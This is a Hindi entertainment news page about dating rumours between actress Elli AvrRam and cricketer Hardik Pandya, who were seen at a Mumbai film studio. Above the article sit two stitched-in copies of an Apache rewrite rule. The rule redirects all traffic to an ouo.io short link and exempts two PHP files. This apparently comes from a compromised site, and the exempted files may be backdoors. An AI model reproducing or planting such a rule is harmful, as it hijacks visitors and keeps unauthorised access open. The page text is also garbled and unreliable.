
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 709
Previous Nextनई दिल्ली। बिग बॉस सीजन 7 की कंटेस्टेंट व एक्ट्रेस एली अवराम और इंडियन क्रिकेट टीम के ऑलराउंडर प्लेयर हार्दिक पंड्या को एक बार फिर मुलाकात करते हुए देखा गया। कथित तौर पर एक दूसरे को डेट कर रहे हार्दिक पंड्या और एली अवराम मुंबई के गोरेगांव स्थित फिल्मीस्तान स्टूडियो में मिले, जहां हार्दिक किसी विज्ञापन की शूटिंग कर रहे हैं। हालांकि दोनों ही कैमरे के सामने एक साथ नहीं आए, लेकिन उन्हें एक ही जगह पर अलग-अलग तस्वीरों में कैद कर लिया गया। कैमरामैनों से घिरीं एली ने सभी को अवाइड करते हुए अपनी कार में बैठकर स्टूडियो से निकल गईं।
आपको बता दें कि पिछले साल दिसंबर में हार्दिक के बड़े भाई क्रुणाल पंड्या के रिसेप्शन में भी एली अवराम को देखा गया था, तभी से यह अफवाह उड़ी कि दोनों ही एक-दूसरे को डेट कर रहे हैं। पिछले कुछ हफ्तों में एयरपोर्ट समेत उन्हें कई बार एक साथ देखा गया, जोकि सोशल मीडिया पर काफी वायरल हो गया। हालांकि अभी तक एली या फिर हार्दिक ने आधिकारिक तौर पर इस मसले को लेकर कोई भी बयान नहीं दिया है और न ही सोशल मीडिया पर कोई भी पोस्ट की है। अगर यह अफवाह सच होती है तो विराट-अनुष्का और जहीर-सागरिका के बाद लेटेस्ट जोड़ी होगी जो बॉलीवुड और क्रिकटर्स की नई जोड़ी बनाएगी।